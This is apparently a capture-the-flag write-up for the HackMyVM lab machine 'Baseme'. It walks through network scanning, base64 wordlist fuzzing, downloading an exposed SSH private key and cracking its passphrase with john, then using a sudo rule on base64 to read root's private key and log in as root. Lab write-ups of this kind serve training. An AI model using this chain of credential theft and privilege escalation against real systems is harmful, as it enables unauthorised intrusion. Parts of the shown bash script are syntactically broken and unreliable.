HackMyVM - Baseme

Tue, April 23, 2024 - 2 min read


baseme image

machine downloaded from https://hackmyvm.eu/

difficulty: Easy

OS: Linux

  1. Scan the network
sudo netdiscover -i eth0 -r

The IP address is

  1. Port and service scanning with nmap
sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -Pn -vvv
-oN report.txt

This machine has 2 services exposed ssh, and http on ports 22 and 80

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  1. Decoding with Base64

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the output:

ALL, absolutely ALL that you need is in BASE64.
Including the password that you need :)
Remember, BASE64 has the answer to all your questions.
  1. We can try with the words found in the html source, creating a list encoded with base64 and user lucas, but it doesn’t work.

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  1. We can try to use gobuster with different base64 dictionaries:


# Specify the file path or name
# Check if the file exists
if [ -f "$file" ]; then
    # Read the file line by line
    while IFS= read -r line
        # Print each line
        echo "$line" | base64 >> base64_common.txt
    done < "$file"
    echo "File not found!"

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  1. We have discovered two new URLs. In the first url we find a private key idrsa and in the other url a file with a text in base64 with the message ‘Nothing here :(‘
wget -qO- wget | base64 -d
wget -qO- wget | base64 -d

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  1. Trying to log in with lucas and private key, its needed a passphrase
ssh -i id_rsa lucas@

Using a combination of ssh2john and jhon the reaper and the passwords found in page source, we can try to find the password.

ssh2john id_rsa > idrsa_john
john --wordlist=base64_list.txt idrsa_john

The passphrase is aWxvdmV5b3UK (iloveyou in Base64)

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  1. We log in as user lucas and get the user.txt flag
ssh -i id_rsa lucas@

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  1. With sudo -l we can see that lucas user has sudo privileges on /urs/bin/base64, we can search in https://gtfobins.github.io/gtfobins/base64/#sudo for the instructions to exploit this vulnerability.

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  1. We can read any file with sudo privileges, so we can read root’s ssh private key and store it in a file to log in as root.

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  1. Using the private root ssh key, we log in and find the root flag.
sudo chmod 600 rootid_rsa
ssh -i rootid_rsa root@

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